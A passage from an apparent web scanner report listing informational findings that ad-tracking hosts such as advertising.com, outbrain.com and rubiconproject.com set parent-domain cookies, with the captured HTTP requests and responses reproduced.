User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=8e1e1163986432e20f9603df067356d2; NETSEGS_G08769=bff01c00ddc153c5&G08769&0&4de391c0&0&&4dbe39cf&271d956a153787d6fee9112e9c6a9326; NETSEGS_E05516=bff01c00ddc153c5&E05516&0&4de3922b&0&&4dbcdaf4&271d956a153787d6fee9112e9c6a9326; NETSEGS_G07608=bff01c00ddc153c5&G07608&0&4de3df00&0&&4dbe409f&271d956a153787d6fee9112e9c6a9326; NETSEGS_B08725=bff01c00ddc153c5&B08725&0&4de3dfb9&0&&4dbd04bb&271d956a153787d6fee9112e9c6a9326; NETSEGS_F07607=bff01c00ddc153c5&F07607&0&4de3dffd&6&10124,10098,10078,10053,10100,10143&4dbe0e23&271d956a153787d6fee9112e9c6a9326; NETSEGS_K08784=bff01c00ddc153c5&K08784&0&4de3fb79&0&&4dbe5453&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05540=bff01c00ddc153c5&K05540&0&4de595d8&10&10572,10573,10342,10343,10391,10395,10432,10537,10538,10166&4dbfac5c&271d956a153787d6fee9112e9c6a9326; NETSEGS_H07710=bff01c00ddc153c5&H07710&0&4de96140&0&&4dc3b759&271d956a153787d6fee9112e9c6a9326; udm_0=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; NETSEGS_H10972=bff01c00ddc153c5&H10972&0&4de961a8&0&&4dc36aa3&271d956a153787d6fee9112e9c6a9326; NETSEGS_K05539=bff01c00ddc153c5&K05539&0&4de961b8&1&10592&4dc358e3&271d956a153787d6fee9112e9c6a9326; NETSEGS_J05531=bff01c00ddc153c5&J05531&0&4dea160e&0&&4dc4b40e&271d956a153787d6fee9112e9c6a9326; rsi_segs_1000000=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; rtc_dGQ8=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; rsiPus_wuF1="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"; 
rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+LBAm++DA1mQ19Ktk0xHsNbUdnssfo0Gg2GtNOjezP3rQsX+ieC4o2fHI9QkQeov8FSjRptD7ENVbUid4nnMJw2upjcbtYuTDvN446ehF3GgXLLZTbonI4jYrOBasvRFfMnkE53wY4Qa+hKdx6gukgA/85R9jXhtGV7/piYr5YQZgjMiKl8zWjUoD0F3UhqKyr9Id97BfRNHCeDUiGyQYV3IR679d+6Fpy0gp1Hq2XjxlJKDOqjAs1Uw1dudiAIQw7rizeuLD3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL0wt1TCMgGvoSIbnMIU57JYoUftomTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nEMImFBKzd64qvE1zt38WPal3ooNbYqY4hIZWj8N4pKHLwHPyWzs/CsI6rWRhrWMPRaUafMfQn/v0U75IJgD8TGuloOwC16CAbvKgsBHdSES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafWYD1uqtnSaqyiY5cSyX1S9pZYVMWf8I99X0PmkHmiE+AmJ2pOIUjqqv8lHsXuUlO5LZo1crEog7F/asoNmA7+b1HAp4GyFPw8IccpCRD55tkYzvfpalmWhSIak/31maiBYBGTGdMPAhhPIWehJXnhsO0s79zhTvo+mhSTEb31vIjsG19H8uhSlb70Xz/RdUHnSSFQu2fn9OoA0ULdTsbgEYRNxte1+V4Vu5pclZS/SluGYRGqFciUTHH7jlTzS7r4Od1PDbqHOXOoGhgdQKRwlGytvhlJ3xpN38TeBBvuSli78zJal5w2RgiXvdzsle4GypMSBJTlBFpkLcvXbok3eHAtIL39rfw/UIu83ImxrDg6smRtaoCYqy6FrPvEOZvbHeZKJ1G6PoYEXV8RC7c5ut/7o1FJqaAV9fv+dLKW/LayYdfhFv6v33uPJSN5cTsetqde/n2tODUxKQxVKARJrsoIbuTvqK0rkezL0LMNB5mMi30PtNyanRSr/WUuwQZpJ60S6tI3fUgKWeajoXdlSIz4FFghQ9I+YJhmXQ9IxhQqDK+BwrtqJ+G/7aCwcyCBYmRkfHJc/Flc9ttNYB8QLSGHHxZcNV7DJc5sT00OUsUVmrKDXWc+nRcX1WiQ/VkP0PS/bC1/DbhNecPWVRE0AXkOh/IOoVf06+8SOgC8Ev3jO0RbucQa8aazOvezkk7zeyQCkyl2Mc4X9xCgxUsXK9DtZSCJK6m2R/mQCTbaItUg3/6EIcy8zL2Scsdi6aQPsU9UrkfVegfH0Uty3GkCV77GW5oseV6DHz9+RNhUmepmjvJu5cKj0grDAv9MP790ikGiL9Vbfl+2hPsPfIsGhjWXsvCaPLDLnnlLu7s6jCtbDAg+6/AWwustsHfWZNO9mP2B2hNB72eXivVKC3ScCpTMJq/yXGNl7gyrzILPyfzvctlhE7tAAL1KCRqQVBYdg=="
If-Modified-Since: Mon, 02 May 2011 20:22:43 GMT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=...[SNIP]...; Domain=.revsci.net; Expires=Tue, 08-May-2012 13:59:31 GMT; Path=/
Last-Modified: Mon, 09 May 2011 13:59:31 GMT
Cache-Control: max-age=3600, private
Expires: Mon, 09 May 2011 14:59:31 GMT
X-Proc-ms: 2
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 09 May 2011 13:59:30 GMT
Content-Length: 5035

//Vermont 12.4.0-1203 (2011-04-19 22:06:07 UTC)
var rsi_now= new Date();
var rsi_csid= 'B08725';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da){
...[SNIP]...

9.55. http://leadback.advertising.com/adcedge/lb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://leadback.advertising.com
Path:   /adcedge/lb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adcedge/lb?site=695501&betr=tc=1,99999,51134,50086,50085,53380,60490,60512,50963,52615,60491,50507,53656,55401,60509,57094,50961,52841,51182,56419,54032,51186,56988,56673,56148,57362,56969,60203,56835,56987,56780,50220,56768,56299,56761,54057,56681&guidm=1:16r4opq1tvlkml&bnum=23230 HTTP/1.1
Host: leadback.advertising.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ACID=aw960013034229720018; aceRTB=rm%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cam%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Cdc%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Can%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7Crub%3DSat%2C%2021%20May%202011%2022%3A07%3A59%20GMT%7C; SESSece087221ae81b2ccde2334499ee4548=d138b6ea0107f86bc8ce8957059b7431; s_pers=%20s_getnr%3D1304388622973-New%7C1367460622973%3B%20s_nrgvo%3DNew%7C1367460622975%3B; F1=B8ziF3kAAAAAgCsCAEAAgEABAAAABAAAAMAAgEA; BASE=Rgwq9yEw9v+atCAoEOaIRHpvOehiQ9Sa8LM+diGiDsajKw8yV1LAPA7+GvRiJhbJt6Hv50y77rIfdG5+2unWu4QL44U5Tp5J7h57WACK9DFolo7ZgEE+TO66LxZCWBHxwyDEc8c4CpUSJWcFkgw700b6zAWA9p1kL5hoC+WRIuMIIHq0xcOEQ9R2J3eAQ44q0qPrQrsF+Mlvp1J!; ROLL=boAnq2C+ORAgHEGte/mz/DHyJN5VpuB!; C2=MzzxN5pqDIxFGMnovQg3sYAGSK8BItdRzdQ3WX0cHsY4FN3Bw3gRzdQ7NY0cHoLOGN3BKGeRzdwmhX0cH8eDGN3BdDmRzdwohX0cHQY4FN3BYimRzdA3Wa0cHoa4FN3BA9qRzdgdeZ0cH4fFGN3BbTeRzdwKOa0cHoN5FN3BC9qRzdwtZa0cHE0rGN3BFBqRzdQTaa0cHY4dGN3BNLqRzVrqEoxsGgRtrSQIza8QRGABg2chsZm5Ia4SxOCBsRpRE1I9IsfzFOxi4SQBwWQdltCqGyHseSw7Ra0gVSPBrLqB1NJUEQT2FNIruTQAzZ0g0KHBbzqRDm6BE8sXGNIogVwrgYICzWdBkoqBXN67FcNNG8YkAbwuRX4dumvBEOpBlOLUGsEpGALq+bQoeZktfOsBgwhxdX7/HUJtGuTZpTrhzFqFH09IGGXo8ew5qY0cY6wBsMixQdAnjaMUHEv9FDVqGdQ9fZ0/FirZDughLFLJI8GlGAH; GUID=MTMwNDkwMjg2MDsxOjE2cjRvcHExdHZsa21sOjM2NQ

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 09 May 2011 13:59:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
P3P: CP=NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV
Set-Cookie: C2=bN/xN5pqDIxFGxkovMg3sYU8SKMCItdBwhQ3WXAcIsY4FAHCw3gBwhQ7NYAcIoLOGAHCKGeBwhwmhXAcI8eDGAHCdDmBwhwohXAcIQY4FAHCYimBwhA3WaAcIoa4FAHCA9qBwhgdeZAcI4fFGAHCbTeBwhwKOaAcIoN5FAHCC9qBwhwtZaAcIE0rGAHCFBqBwhQTaaAcIY4dGAHCNLqBwVrqDoxsGFftrSQIzaQHRGABg2cxFZm5IaMJxOCBsRphd0I9HsfzFz+i4SQBwWkTltCqGXFseSw7RaIXVSPBrLqRONJUEQT2FyFruTQAzZIX0KHBbzqhcl6BE8sXGyFogRwrgYc4zWdBkoqRwM67FcNNGhWkAbwuRXMUumvBEOpR+NLUGsEpGlIq+bQoeZ4jfOsBgwhB3W7/HUJtGTRZpTrxMFqFH09IGrUo8ew5qYITY6wBsMiBqcAnjagKHEv9FoSqGdQ9fZI2FirZDugxkELJI8GlGlE; domain=advertising.com; expires=Wed, 08-May-2013 13:59:55 GMT; path=/
Set-Cookie: GUID=MTMwNDk0OTU5NTsxOjE2cjRvcHExdHZsa21sOjM2NQ; domain=advertising.com; expires=Wed, 08-May-2013 13:59:55 GMT; path=/
Set-Cookie: DBC=; domain=advertising.com; expires=Thu, 01-Jan-1970 00:00:00 GMT; path=/
Cache-Control: private, max-age=3600
Expires: Mon, 09 May 2011 14:59:55 GMT
Content-Type: image/gif
Content-Length: 49

GIF89a...................!.......,...........T..;

9.56. http://newspaper.app40.ur.gcion.com/GCION.ashx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newspaper.app40.ur.gcion.com
Path:   /GCION.ashx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /GCION.ashx?q=5&Segment=D08734_70008%7CD08734_72078&CacheDefeat=1304949583122 HTTP/1.1
Host: newspaper.app40.ur.gcion.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: rsi_segs=D08734_70008|D08734_72078; domain=.gcion.com; expires=Tue, 08-May-2012 13:59:45 GMT; path=/
Cache-Control: private
Content-Length: 0


9.57. http://odb.outbrain.com/utils/odb

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/odb

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /utils/odb?method=get_score_rec&key=GANHREW345&url=http%3A//www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages&idx=0&num=5&srv_pc=true&max_num_ads=1&nostar=true&format=json&callback=GEL.thepage.pageinfo.outbrain.init&blog_posts=true HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; _lvs2=uaMqgoSgWEsyZpjyGwNcoBSjR24A8Yxx; _rcc2="c5YqA63GvjSl+Ov6ordflA=="

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: obuid=ae560ffe-5e98-425c-bc63-febb0fb6e1ae; Domain=.outbrain.com; Expires=Thu, 03-May-2012 14:00:34 GMT; Path=/
Cache-Control: no-cache
Pragma: no-cache
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="uaMqgoSgWEsyZpjyGwNcoLoN1lBMsXDlkJWlQEP7SN0="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 14:00:34 GMT; Path=/
Set-Cookie: _lvd2="27vfag1ZPzcjif+xs0aSMA=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Mon, 16-May-2011 02:48:34 GMT; Path=/
Set-Cookie: _rcc2="c5YqA63GvjSl+Ov6ordflA=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Mon, 04-Jun-2012 14:00:34 GMT; Path=/
Set-Cookie: recs="FV47GVeXROTRQDQGso7n7BJgimfU4hutZsi+REu/kRSXRrfTy1nLEJ07hVMifX9qva0UddJWrWk="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Mon, 09-May-2011 14:05:34 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:33 GMT
Content-Length: 3991

GEL.thepage.pageinfo.outbrain.init({'response':{'exec_time':18,'status':{'id':0,'content':'Request succeeded'},'request':{'did':'204042585','req_id':'1f9a95338cac93e0d7953f1aee6ee9d4'},'score':{'prefe
...[SNIP]...

9.58. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-15.js?cb=0.3376502951141447&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; rdk15=0; ses15=13549^1&13264^1; csi15=3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk2=0; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:04:49 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:04:49 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:04:49 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1&12590^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64510; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196048.js^1^1304949889^1304949889&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:04:49 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2211

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196048"
...[SNIP]...

9.59. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22782-2.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22782-2.js?cb=0.24485393334180117&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi2=3204821.js^1^1304807875^1304807875; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; rdk15=0; ses15=13549^1; csi15=3151665.js^1^1304949670^1304949670; rdk=7858/13549; rdk9=0; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:02:16 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:02:16 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Mon, 09-May-2011 15:02:16 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12590^1; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64663; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi2=3196046.js^1^1304949736^1304949736; expires=Mon, 16-May-2011 14:02:16 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2210

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196046"
...[SNIP]...

9.60. http://optimized-by.rubiconproject.com/a/7856/12590/22893-15.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-15.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-15.js?cb=0.14613070245832205&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680; rdk=7856/12590; rdk15=0; ses15=13549^1&13264^1&12590^1; csi15=3173215.js^1^1304949690^1304949690&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:50 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Mon, 09-May-2011 15:06:50 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=0; expires=Mon, 09-May-2011 15:06:50 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=13549^1&13264^1&12590^2; expires=Tue, 10-May-2011 04:59:59 GMT; max-age=64389; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=3196048.js^1^1304950010^1304950010&3173215.js^1^1304949690^1304949690&3200915.js^1^1304949679^1304949679&3151665.js^1^1304949670^1304949670; expires=Mon, 16-May-2011 14:06:50 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Connection: close
Content-Type: application/x-javascript
Content-Length: 2211

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3196048"
...[SNIP]...

9.61. http://optimized-by.rubiconproject.com/a/7856/12590/22893-2.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/7856/12590/22893-2.js

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain (see the Set-Cookie headers in the response below). The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/7856/12590/22893-2.js?cb=0.7725758128799498&keyword=music HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_2100=usr3fd49cb9a7122f52; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; put_1986=2724386019227846218; cd=false; put_1185=2931142961646634775; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%264212%3D1%264705%3D1; ruid=154dab7990adc1d6f3372c12^9^1304949670^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; ses9=13549^1; csi9=3200914.js^1^1304949675^1304949675; ses2=12590^1&13549^1; csi2=3200913.js^1^1304949680^1304949680&3196046.js^1^1304949680^1304949680; rdk=7856/12590; 